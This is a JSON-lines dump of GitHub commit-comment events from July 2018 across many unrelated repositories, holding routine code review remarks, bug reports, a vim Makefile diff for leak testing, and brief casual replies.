{"id":"8000927848","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29794408,"position":null,"line":null,"path":null,"commit_id":"ad6480961080f80a455b2394f27b02935a2ded52","created_at":"2018-07-22T21:50:24Z","updated_at":"2018-07-22T21:50:24Z","author_association":"NONE","body":"@dpelle \r\nStill getting this leak with the following:\r\n```diff\r\ndiff --git i/src/Makefile w/src/Makefile\r\nindex f2fafa4dc..965583f62 100644\r\n--- i/src/Makefile\r\n+++ w/src/Makefile\r\n@@ -699,7 +699,7 @@ SANITIZER_LIBS = $(SANITIZER_CFLAGS)\r\n # Configuration is in the .ccmalloc or ~/.ccmalloc file.\r\n # Doesn't work very well, since memory linked to from global variables\r\n # (in libraries) is also marked as leaked memory.\r\n-#LEAK_CFLAGS = -DEXITFREE\r\n+LEAK_CFLAGS = -DEXITFREE\r\n #LEAK_LIBS = -lccmalloc\r\n \r\n # Uncomment this line to have Vim call abort() when an internal error is\r\n@@ -1156,7 +1156,7 @@ INSTALL_DATA_R    = cp -r\r\n \r\n ### Program to run on installed binary.  Use the second one to disable strip.\r\n #STRIP = strip\r\n-#STRIP = /bin/true\r\n+STRIP = /bin/true\r\n \r\n ### Permissions for binaries  {{{1\r\n BINMOD = 755\r\n```"}},"created_at":"2018-07-22T21:50:24Z"}
{"id":"8000927939","type":"CommitCommentEvent","actor":{"login":"ozkriff"},"repo":{"name":"ggez/ggez"},"payload":{"comment":{"id":29794409,"position":24,"line":11,"path":"src/lib.rs","commit_id":"c090ee175ba0069a0cb44fefdd85e27e52fb647c","created_at":"2018-07-22T21:50:28Z","updated_at":"2018-07-22T21:50:28Z","author_association":"CONTRIBUTOR","body":"`(README.md)[https://github.com/ggez/ggez/)` - broken MD link"}},"created_at":"2018-07-22T21:50:28Z"}
{"id":"8000929232","type":"CommitCommentEvent","actor":{"login":"acheo"},"repo":{"name":"acheo/cordova-plugin-ad-chartboost"},"payload":{"comment":{"id":29794410,"position":null,"line":null,"path":null,"commit_id":"fa0f3193848b39870ab9a2f5dd85d9419da63131","created_at":"2018-07-22T21:51:28Z","updated_at":"2018-07-22T21:51:28Z","author_association":"OWNER","body":"yup"}},"created_at":"2018-07-22T21:51:28Z"}
{"id":"8000935487","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29794416,"position":null,"line":null,"path":null,"commit_id":"a6bc222e6a43585465a584cf5cda2e816d56743c","created_at":"2018-07-22T21:55:59Z","updated_at":"2018-07-22T21:55:59Z","author_association":"MEMBER","body":"As far as I can see there is some amount of grouping with empty lines going on in std. Those empty lines will get lost, so maybe that is a case for `// @formatter:off` anyway.\r\n\r\n"}},"created_at":"2018-07-22T21:55:59Z"}
{"id":"8000937772","type":"CommitCommentEvent","actor":{"login":"saibatizoku"},"repo":{"name":"saibatizoku/font8x8-rs"},"payload":{"comment":{"id":29794420,"position":null,"line":null,"path":null,"commit_id":"de98d28399979d3d98ccdb9ee8e45bdfcf41176a","created_at":"2018-07-22T21:57:47Z","updated_at":"2018-07-22T21:57:47Z","author_association":"OWNER","body":"This closes #3 "}},"created_at":"2018-07-22T21:57:47Z"}
{"id":"8000939784","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29794422,"position":null,"line":null,"path":null,"commit_id":"ccb265b0a529d52b5e95b78bb842224af1071111","created_at":"2018-07-22T21:59:19Z","updated_at":"2018-07-22T21:59:19Z","author_association":"NONE","body":"~you hella gay~"}},"created_at":"2018-07-22T21:59:19Z"}
{"id":"8000943087","type":"CommitCommentEvent","actor":{"login":"Chrisnetika"},"repo":{"name":"MalloyDelacroix/DownloaderForReddit"},"payload":{"comment":{"id":29794432,"position":null,"line":null,"path":null,"commit_id":"6be5d5a5145174eb56b53ab222941cabe648c331","created_at":"2018-07-22T22:01:08Z","updated_at":"2018-07-22T22:01:08Z","author_association":"NONE","body":"Won't run, fresh install of python 3.7.0 windows\r\nFollowed the wiki as instructed\r\nhttps://imgur.com/a/kr66YSE"}},"created_at":"2018-07-22T22:01:08Z"}
{"id":"8000947868","type":"CommitCommentEvent","actor":{"login":"kgupta2305"},"repo":{"name":"kgupta2305/test-website"},"payload":{"comment":{"id":29794440,"position":null,"line":null,"path":null,"commit_id":"9c8925482a5d9a9a5635d0c1e98c75d2520255c4","created_at":"2018-07-22T22:04:47Z","updated_at":"2018-07-22T22:04:47Z","author_association":"OWNER","body":"Test comment"}},"created_at":"2018-07-22T22:04:47Z"}
{"id":"8000947903","type":"CommitCommentEvent","actor":{"login":"Apaccinho"},"repo":{"name":"Apaccinho/Calculator"},"payload":{"comment":{"id":29794441,"position":null,"line":null,"path":null,"commit_id":"4bd04d3d5104e4440d694138fd5aacdb44ea5cfe","created_at":"2018-07-22T22:04:49Z","updated_at":"2018-07-22T22:04:49Z","author_association":"OWNER","body":"Case 7,8 done. Just 9 left."}},"created_at":"2018-07-22T22:04:49Z"}
{"id":"8000949842","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pycountry-feedstock"},"payload":{"comment":{"id":29794445,"position":null,"line":null,"path":null,"commit_id":"8fdf7cb97aaa46bbf560a7e34427e1a7c7c4eccd","created_at":"2018-07-22T22:06:15Z","updated_at":"2018-07-22T22:06:15Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-22T22:06:15Z"}
{"id":"8000954078","type":"CommitCommentEvent","actor":{"login":"mister-simon"},"repo":{"name":"mister-simon/node-computercraft-server"},"payload":{"comment":{"id":29794447,"position":null,"line":null,"path":null,"commit_id":"19be65b4d7b0ae4f863cc4465f5da0e05111b59e","created_at":"2018-07-22T22:09:29Z","updated_at":"2018-07-22T22:09:29Z","author_association":"OWNER","body":"The ? in the commit should be a \"👌\"... FYI."}},"created_at":"2018-07-22T22:09:29Z"}
{"id":"8000960424","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794461,"position":null,"line":null,"path":null,"commit_id":"6515354e0cece36f11195ffeb1d8701720359f58","created_at":"2018-07-22T22:14:27Z","updated_at":"2018-07-22T22:14:27Z","author_association":"MEMBER","body":"continous phone FC both in rom & gsi till phone automatically shuts itself"}},"created_at":"2018-07-22T22:14:27Z"}
{"id":"8000961654","type":"CommitCommentEvent","actor":{"login":"ricea"},"repo":{"name":"whatwg/streams"},"payload":{"comment":{"id":29794466,"position":null,"line":null,"path":null,"commit_id":"a27a1fd0f8640d6054e0cbc8b6d7f5464dd096ab","created_at":"2018-07-22T22:15:25Z","updated_at":"2018-07-22T22:15:25Z","author_association":"COLLABORATOR","body":"As @domenic notes over at web-platform-tests/wpt#12125, the objects with null prototypes are not exposed to user code. The reference implementation passes the tests, so if the standard doesn't it's a bug."}},"created_at":"2018-07-22T22:15:25Z"}
{"id":"8000962174","type":"CommitCommentEvent","actor":{"login":"lol768"},"repo":{"name":"tmazeika/blueproxy-server"},"payload":{"comment":{"id":29794468,"position":3,"line":3,"path":"README.md","commit_id":"88414c24e95c535c740655c6e5e2d8b524eb21c5","created_at":"2018-07-22T22:15:47Z","updated_at":"2018-07-22T22:15:47Z","author_association":"NONE","body":":cry:"}},"created_at":"2018-07-22T22:15:47Z"}
{"id":"8000966965","type":"CommitCommentEvent","actor":{"login":"gerhardol"},"repo":{"name":"dratasich/runnerup"},"payload":{"comment":{"id":29794473,"position":4,"line":81,"path":"app/src/org/runnerup/tracker/Tracker.java","commit_id":"a8b567e1de9e6ff6cee48428256f7ce867f2bf28","created_at":"2018-07-22T22:19:36Z","updated_at":"2018-07-22T22:19:36Z","author_association":"NONE","body":"A good move to separate the tracker and the location listener.  The tracker should probably have a timer ticker still."}},"created_at":"2018-07-22T22:19:36Z"}
{"id":"8000967442","type":"CommitCommentEvent","actor":{"login":"raa-eruanna"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29794474,"position":null,"line":null,"path":null,"commit_id":"fccb0b76c6a99954628b8c819fbddb018ee8a061","created_at":"2018-07-22T22:20:01Z","updated_at":"2018-07-22T22:20:01Z","author_association":"COLLABORATOR","body":"https://github.com/coelckers/gzdoom/commit/fccb0b76c6a99954628b8c819fbddb018ee8a061\r\n\r\nI'm hoping we can call this fixed now..."}},"created_at":"2018-07-22T22:20:01Z"}
{"id":"8000968650","type":"CommitCommentEvent","actor":{"login":"zenmumbler"},"repo":{"name":"whatwg/streams"},"payload":{"comment":{"id":29794477,"position":null,"line":null,"path":null,"commit_id":"a27a1fd0f8640d6054e0cbc8b6d7f5464dd096ab","created_at":"2018-07-22T22:20:53Z","updated_at":"2018-07-22T22:20:53Z","author_association":"NONE","body":"Hi Adam, I just posted a retraction there and what went wrong. My only defence and potential note is that optional/defaulted boolean arguments at the end of a parameter list are easily overlooked, but in hindsight my assumption that the WPT tests could inspect the actual private implementation details of my code makes no sense at all. Sorry for the noise and have a good week."}},"created_at":"2018-07-22T22:20:53Z"}
{"id":"8000980066","type":"CommitCommentEvent","actor":{"login":"cassioconti"},"repo":{"name":"cassioconti/blockchain-playground"},"payload":{"comment":{"id":29794494,"position":null,"line":null,"path":null,"commit_id":"7772e6a7043e3798e2e3e5d00485c7b1ada00576","created_at":"2018-07-22T22:29:44Z","updated_at":"2018-07-22T22:29:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add post block endpoint](https://trello.com/c/fAw3reBO/3-add-post-block-endpoint)"}},"created_at":"2018-07-22T22:29:44Z"}
{"id":"8000986652","type":"CommitCommentEvent","actor":{"login":"cimada"},"repo":{"name":"cimada/Assignment6"},"payload":{"comment":{"id":29794507,"position":null,"line":null,"path":null,"commit_id":"690f6603af53bd603c915bdfe9171ad5cc27e89d","created_at":"2018-07-22T22:34:51Z","updated_at":"2018-07-22T22:34:51Z","author_association":"OWNER","body":"![huh](https://user-images.githubusercontent.com/41349470/43050867-251e0126-8dcd-11e8-9191-190b951400ff.JPG)\r\n"}},"created_at":"2018-07-22T22:34:51Z"}
{"id":"8000986747","type":"CommitCommentEvent","actor":{"login":"Emilio666"},"repo":{"name":"MathewSachin/Captura"},"payload":{"comment":{"id":29794508,"position":null,"line":null,"path":null,"commit_id":"5197ecc68015dfb2bb592bf2e2562ba54312b00f","created_at":"2018-07-22T22:34:55Z","updated_at":"2018-07-22T22:34:55Z","author_association":"NONE","body":"### ****"}},"created_at":"2018-07-22T22:34:55Z"}
{"id":"8000987095","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794509,"position":25,"line":32,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T22:35:09Z","updated_at":"2018-07-22T22:35:09Z","author_association":"OWNER","body":"> possibility for front-end component to set a default value for each task\r\nWat? And if Maxim wishes to change the default value then he will ask us to make changes in our front-end code??? How can any data be stored not in DB?\r\n\r\n> gameTask.cost || game.GeneralTasksDefaultCost? \r\nYes, exactly. I did in next commits.\r\n\r\nConclusion. Wi either don't need to have a default value or need to store it in DB. We won't store it on client side as hardcode."}},"created_at":"2018-07-22T22:35:09Z"}
{"id":"8000987730","type":"CommitCommentEvent","actor":{"login":"azharf"},"repo":{"name":"azharf/CS362-004-U2018"},"payload":{"comment":{"id":29794511,"position":null,"line":null,"path":null,"commit_id":"46e44a7507463e432b58f4bdbc08afbaaa75fd2c","created_at":"2018-07-22T22:35:42Z","updated_at":"2018-07-22T22:35:42Z","author_association":"OWNER","body":"Added files"}},"created_at":"2018-07-22T22:35:42Z"}
{"id":"8000989318","type":"CommitCommentEvent","actor":{"login":"brunoxd13"},"repo":{"name":"udacity/reactnd-contacts-app"},"payload":{"comment":{"id":29794516,"position":41,"line":16,"path":"src/ListContacts.js","commit_id":"b7b51c961edd507582974c60cd0c3635be66e8bb","created_at":"2018-07-22T22:37:01Z","updated_at":"2018-07-22T22:37:01Z","author_association":"NONE","body":"Here should be:\r\n`<p>{contact.email}</p>`"}},"created_at":"2018-07-22T22:37:01Z"}
{"id":"8000990917","type":"CommitCommentEvent","actor":{"login":"Emilio666"},"repo":{"name":"MathewSachin/Captura"},"payload":{"comment":{"id":29794517,"position":null,"line":null,"path":null,"commit_id":"5197ecc68015dfb2bb592bf2e2562ba54312b00f","created_at":"2018-07-22T22:38:26Z","updated_at":"2018-07-22T22:38:26Z","author_association":"NONE","body":"#241 ](url)"}},"created_at":"2018-07-22T22:38:26Z"}
{"id":"8000993986","type":"CommitCommentEvent","actor":{"login":"Emilio666"},"repo":{"name":"MathewSachin/Captura"},"payload":{"comment":{"id":29794519,"position":null,"line":null,"path":null,"commit_id":"5197ecc68015dfb2bb592bf2e2562ba54312b00f","created_at":"2018-07-22T22:41:01Z","updated_at":"2018-07-22T22:41:01Z","author_association":"NONE","body":"@KNTRO "}},"created_at":"2018-07-22T22:41:01Z"}
{"id":"8000994418","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794521,"position":23,"line":30,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T22:41:18Z","updated_at":"2018-07-22T22:41:18Z","author_association":"OWNER","body":"@gmltA,\r\nI didn't think about it. May be, it's a better way\r\n"}},"created_at":"2018-07-22T22:41:18Z"}
{"id":"8000998137","type":"CommitCommentEvent","actor":{"login":"banyucenter"},"repo":{"name":"ipungdev/purwokertojs.org"},"payload":{"comment":{"id":29794523,"position":null,"line":null,"path":null,"commit_id":"d9dcce7cfeb1e386776a4ca75a06f3497b0347ff","created_at":"2018-07-22T22:44:12Z","updated_at":"2018-07-22T22:44:12Z","author_association":"CONTRIBUTOR","body":"Pencarian di home page untuk mendapatkan data terkait dengan event yang dicari. Result akan dilempar ke halaman hasilcari.js"}},"created_at":"2018-07-22T22:44:12Z"}
{"id":"8000998237","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29794524,"position":null,"line":null,"path":null,"commit_id":"9f39ec026040cb3bb3086c54356fd3bad05ac247","created_at":"2018-07-22T22:44:17Z","updated_at":"2018-07-22T22:44:17Z","author_association":"CONTRIBUTOR","body":"If needed, I could code something for custom boxes from a sprite sheet "}},"created_at":"2018-07-22T22:44:17Z"}
{"id":"8000999689","type":"CommitCommentEvent","actor":{"login":"banyucenter"},"repo":{"name":"ipungdev/purwokertojs.org"},"payload":{"comment":{"id":29794529,"position":null,"line":null,"path":null,"commit_id":"2fa79b0371eed68fb0d37cf99bfde634e9050aa2","created_at":"2018-07-22T22:45:30Z","updated_at":"2018-07-22T22:45:30Z","author_association":"CONTRIBUTOR","body":"Edit data menggunakan upload multer berhasil, namun kami belum membuat unlik path image untuk menghapusnya"}},"created_at":"2018-07-22T22:45:30Z"}
{"id":"8001002672","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794534,"position":19,"line":26,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T22:47:58Z","updated_at":"2018-07-22T22:47:58Z","author_association":"OWNER","body":"@gmltA \r\nWell, actually I still try to understand how you gonna create game task sequences. I thought it would be in a moment of new game creating. If it wouldn't then we ain't gonna need it here, yes. But in such case I need you to give me detailed info how you gonna create sequences. I'm clear only with how it should be with task sets, where TaskSet is just a feature for client side."}},"created_at":"2018-07-22T22:47:58Z"}
{"id":"8001003147","type":"CommitCommentEvent","actor":{"login":"coagmano"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":29794536,"position":22,"line":12,"path":"imports/ui/App.js","commit_id":"e618d9e3650682448456219b32d29ee9d0023925","created_at":"2018-07-22T22:48:22Z","updated_at":"2018-07-22T22:48:22Z","author_association":"NONE","body":"Not a bug. Arrow functions without curly braces return implicitly. In this example, the parentheses `(...)` keep the return behaviour across multiple lines"}},"created_at":"2018-07-22T22:48:22Z"}
{"id":"8001003861","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":29794539,"position":null,"line":null,"path":null,"commit_id":"533223634f893bba838ada3f026d1f072339160e","created_at":"2018-07-22T22:48:56Z","updated_at":"2018-07-22T22:48:56Z","author_association":"MEMBER","body":"Thanks for the information, but I think I'll stick with this anyway.\r\n\r\nI don't mind the extra parens much anymore. Initially I did -- a lot -- but then I ended up using them anyway (only in other packages for a while) because its less ambiguous. Now I am okay with having to choose between anaphoric `(--when-let (something) ...)` and the slightly verbose `(when-let ((named (something))) ...)`. `(when-let (named (something)) ...)` doesn't really gain much either way, and I don't have to think about `(when-let (named something) ...)`.\r\n\r\nWhen I realized that I was actually a bit surprised. :stuck_out_tongue_winking_eye: "}},"created_at":"2018-07-22T22:48:56Z"}
{"id":"8001003950","type":"CommitCommentEvent","actor":{"login":"Abd-ulRahman"},"repo":{"name":"Abd-ulRahman/WoW"},"payload":{"comment":{"id":29794540,"position":null,"line":null,"path":null,"commit_id":"d507db134f34901e34b0f0908e1f8a619a8ecdf8","created_at":"2018-07-22T22:49:00Z","updated_at":"2018-07-22T22:49:00Z","author_association":"OWNER","body":"Initial"}},"created_at":"2018-07-22T22:49:00Z"}
{"id":"8001004623","type":"CommitCommentEvent","actor":{"login":"mmoll"},"repo":{"name":"theforeman/foreman_ansible"},"payload":{"comment":{"id":29794543,"position":4,"line":23,"path":"foreman_ansible_core.gemspec","commit_id":"e258437698c7cc5115f5c7b3673bea4cb84273e6","created_at":"2018-07-22T22:49:35Z","updated_at":"2018-07-22T22:49:35Z","author_association":"MEMBER","body":"@dLobatog @ares could this get changed, please?"}},"created_at":"2018-07-22T22:49:35Z"}
{"id":"8001005636","type":"CommitCommentEvent","actor":{"login":"brandonkal"},"repo":{"name":"ryanwiemer/gatsby-starter-gcn"},"payload":{"comment":{"id":29794545,"position":null,"line":null,"path":null,"commit_id":"7f22027945022d4a629c17f2354b75312ea02cad","created_at":"2018-07-22T22:50:23Z","updated_at":"2018-07-22T22:50:23Z","author_association":"CONTRIBUTOR","body":"Thank you for the suggestions, I've made a PR for this: #26"}},"created_at":"2018-07-22T22:50:23Z"}
{"id":"8001007167","type":"CommitCommentEvent","actor":{"login":"cassioconti"},"repo":{"name":"cassioconti/blockchain-playground"},"payload":{"comment":{"id":29794547,"position":null,"line":null,"path":null,"commit_id":"3de339924f325e466f6ab3a3836ddb482f988c38","created_at":"2018-07-22T22:51:35Z","updated_at":"2018-07-22T22:51:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update project README.md](https://trello.com/c/w1pcbPGe/4-update-project-readmemd)"}},"created_at":"2018-07-22T22:51:35Z"}
{"id":"8001007316","type":"CommitCommentEvent","actor":{"login":"liri321"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29794548,"position":79,"line":130,"path":"app/src/main/java/com/example/android/miwok/ColorsActivity.java","commit_id":"2b548eae0e57d7ad0cbb9c77656fd24215ec6cb4","created_at":"2018-07-22T22:51:42Z","updated_at":"2018-07-22T22:51:42Z","author_association":"NONE","body":"@ashwanth1109 They also provided a [link](https://github.com/udacity/ud839_Miwok/tree/2b548eae0e57d7ad0cbb9c77656fd24215ec6cb4) that shows the state of the code after the quiz, [by going to the NumbersActivity.java](https://github.com/udacity/ud839_Miwok/blob/2b548eae0e57d7ad0cbb9c77656fd24215ec6cb4/app/src/main/java/com/example/android/miwok/NumbersActivity.java) through the link we can see they removed that line."}},"created_at":"2018-07-22T22:51:42Z"}
{"id":"8001007406","type":"CommitCommentEvent","actor":{"login":"bakytesen"},"repo":{"name":"bakytesen/hello-world"},"payload":{"comment":{"id":29794549,"position":4,"line":2,"path":"README.md","commit_id":"168e004704751dde9030b12f630312dee5a5fc73","created_at":"2018-07-22T22:51:45Z","updated_at":"2018-07-22T22:51:45Z","author_association":"OWNER","body":"Depositiry"}},"created_at":"2018-07-22T22:51:45Z"}
{"id":"8001009100","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29794551,"position":null,"line":null,"path":null,"commit_id":"9f39ec026040cb3bb3086c54356fd3bad05ac247","created_at":"2018-07-22T22:53:01Z","updated_at":"2018-07-22T22:53:01Z","author_association":"CONTRIBUTOR","body":"It may work better to have the boxes be just outlines, especially in cases of overlaps or one inside another"}},"created_at":"2018-07-22T22:53:01Z"}
{"id":"8001009759","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29794554,"position":null,"line":null,"path":null,"commit_id":"3b653dae983b45a5c067a0bddf087790f52e1f09","created_at":"2018-07-22T22:53:32Z","updated_at":"2018-07-22T22:53:32Z","author_association":"COLLABORATOR","body":"Tested the ramp_wall bot on all 7 ladder maps, it will wall on the main ramp regardless if the map has a pocket expansion or not."}},"created_at":"2018-07-22T22:53:32Z"}
{"id":"8001010577","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29794556,"position":null,"line":null,"path":null,"commit_id":"3aa0e79a7c437b8387c1b6c4027c14a12557418c","created_at":"2018-07-22T22:54:12Z","updated_at":"2018-07-22T22:54:12Z","author_association":"CONTRIBUTOR","body":"add also `hqq.watch`"}},"created_at":"2018-07-22T22:54:12Z"}
{"id":"8001011294","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29794557,"position":null,"line":null,"path":null,"commit_id":"9f39ec026040cb3bb3086c54356fd3bad05ac247","created_at":"2018-07-22T22:54:48Z","updated_at":"2018-07-22T22:54:48Z","author_association":"CONTRIBUTOR","body":"yeah i think drawRect() would be better here"}},"created_at":"2018-07-22T22:54:48Z"}
{"id":"8001011990","type":"CommitCommentEvent","actor":{"login":"louis77"},"repo":{"name":"louis77/pg"},"payload":{"comment":{"id":29794560,"position":null,"line":null,"path":null,"commit_id":"38067ce8dd24dd5eebb06fd6c57450c86f94d1e2","created_at":"2018-07-22T22:55:27Z","updated_at":"2018-07-22T22:55:27Z","author_association":"OWNER","body":"Resolves #919"}},"created_at":"2018-07-22T22:55:27Z"}
{"id":"8001014171","type":"CommitCommentEvent","actor":{"login":"mAAdhaTTah"},"repo":{"name":"valtech-nyc/babel"},"payload":{"comment":{"id":29794562,"position":null,"line":null,"path":null,"commit_id":"39e7ee6e651c73dba1eb68fea52a8a14e7814cc0","created_at":"2018-07-22T22:57:09Z","updated_at":"2018-07-22T22:57:09Z","author_association":"MEMBER","body":"@nicolo-ribaudo I think this addresses your suggestion RE the Pipeline types, but could you verify?"}},"created_at":"2018-07-22T22:57:09Z"}
{"id":"8001016930","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29794568,"position":null,"line":null,"path":null,"commit_id":"9f39ec026040cb3bb3086c54356fd3bad05ac247","created_at":"2018-07-22T22:59:25Z","updated_at":"2018-07-22T22:59:25Z","author_association":"CONTRIBUTOR","body":"I can do that, but that's why I put a parameter for opacity and color."}},"created_at":"2018-07-22T22:59:25Z"}
{"id":"8001017763","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"twitchbot-discord/language-packs"},"payload":{"comment":{"id":29794572,"position":null,"line":null,"path":null,"commit_id":"92f24b34852467ad006d3627d464faa7304283a4","created_at":"2018-07-22T23:00:09Z","updated_at":"2018-07-22T23:00:09Z","author_association":"NONE","body":"hehe"}},"created_at":"2018-07-22T23:00:09Z"}
{"id":"8001017829","type":"CommitCommentEvent","actor":{"login":"zerocool420"},"repo":{"name":"pili-engineering/PLMediaStreamingKit"},"payload":{"comment":{"id":29794573,"position":null,"line":null,"path":null,"commit_id":"009742c2ff2b07fa8b321a034865b03999d132ae","created_at":"2018-07-22T23:00:11Z","updated_at":"2018-07-22T23:00:11Z","author_association":"NONE","body":"🏧🏧🏧🏧🏧🏧🏧🏧🏧🏧🏧"}},"created_at":"2018-07-22T23:00:11Z"}
{"id":"8001017949","type":"CommitCommentEvent","actor":{"login":"zpv"},"repo":{"name":"HackIllinois/api-stat"},"payload":{"comment":{"id":29794574,"position":null,"line":null,"path":null,"commit_id":"9f853adcb00ad1f7c1d7aa09e747cf69dd8cdd6a","created_at":"2018-07-22T23:00:14Z","updated_at":"2018-07-22T23:00:14Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-22T23:00:14Z"}
{"id":"8001019901","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"twitchbot-discord/language-packs"},"payload":{"comment":{"id":29794580,"position":null,"line":null,"path":null,"commit_id":"92f24b34852467ad006d3627d464faa7304283a4","created_at":"2018-07-22T23:01:41Z","updated_at":"2018-07-22T23:01:41Z","author_association":"NONE","body":"hehe"}},"created_at":"2018-07-22T23:01:41Z"}
{"id":"8001021506","type":"CommitCommentEvent","actor":{"login":"SimLemay"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29794582,"position":25,"line":33,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-22T23:02:57Z","updated_at":"2018-07-22T23:02:57Z","author_association":"CONTRIBUTOR","body":"Valeur arbitraire pour tester"}},"created_at":"2018-07-22T23:02:57Z"}
{"id":"8001024458","type":"CommitCommentEvent","actor":{"login":"borkovic"},"repo":{"name":"rakitzis/rc"},"payload":{"comment":{"id":29794586,"position":null,"line":null,"path":null,"commit_id":"9d071b26bf1b1dcd71efb06dc4fb6c25803856a0","created_at":"2018-07-22T23:05:17Z","updated_at":"2018-07-22T23:05:17Z","author_association":"CONTRIBUTOR","body":"Should `old_if_state` be on stack rather than `static`? Could we have a problem if 2 `ifs` are nested and `walk` is called recursively?"}},"created_at":"2018-07-22T23:05:17Z"}
{"id":"8001024482","type":"CommitCommentEvent","actor":{"login":"ssanniess"},"repo":{"name":"tdwg/PlinianCore"},"payload":{"comment":{"id":29794587,"position":null,"line":null,"path":null,"commit_id":"f6c00432cc76bfc03505d144004cdca022c807cf","created_at":"2018-07-22T23:05:18Z","updated_at":"2018-07-22T23:05:18Z","author_association":"NONE","body":" Thank you, Paco. \nWe are working on bringing back GISIN.org but it’s been challenging.\nAnnie Simpson\n    On Wednesday, July 11, 2018, 4:17:41 AM EDT, PacoPando <notifications@github.com> wrote:  \n \n \nModified to point to GISIN XSDs in GitHub since www.gisin.org is not longer working\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n   "}},"created_at":"2018-07-22T23:05:18Z"}
{"id":"8001025150","type":"CommitCommentEvent","actor":{"login":"SimLemay"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29794588,"position":66,"line":87,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-22T23:05:50Z","updated_at":"2018-07-22T23:05:50Z","author_association":"CONTRIBUTOR","body":"@PhiBabin @sim0504 ca fonctionne mais c'est vraiment laid. Avez-vous des idees pour simplifier la logique?"}},"created_at":"2018-07-22T23:05:50Z"}
{"id":"8001026015","type":"CommitCommentEvent","actor":{"login":"SimLemay"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29794590,"position":95,"line":191,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-22T23:06:31Z","updated_at":"2018-07-22T23:06:31Z","author_association":"CONTRIBUTOR","body":"Le cercle apparait plein dans le UI Debug, meme avec is_fill=False"}},"created_at":"2018-07-22T23:06:31Z"}
{"id":"8001026157","type":"CommitCommentEvent","actor":{"login":"favonia"},"repo":{"name":"liyishuai/coq-http2"},"payload":{"comment":{"id":29794591,"position":94,"line":94,"path":"src/HPACK/HPACKTypes.v","commit_id":"88963344e21b9e62e2f23aa09b58b91437331936","created_at":"2018-07-22T23:06:39Z","updated_at":"2018-07-22T23:06:39Z","author_association":"COLLABORATOR","body":"Just curious---what is this static table for other than testing the `add` API?"}},"created_at":"2018-07-22T23:06:39Z"}
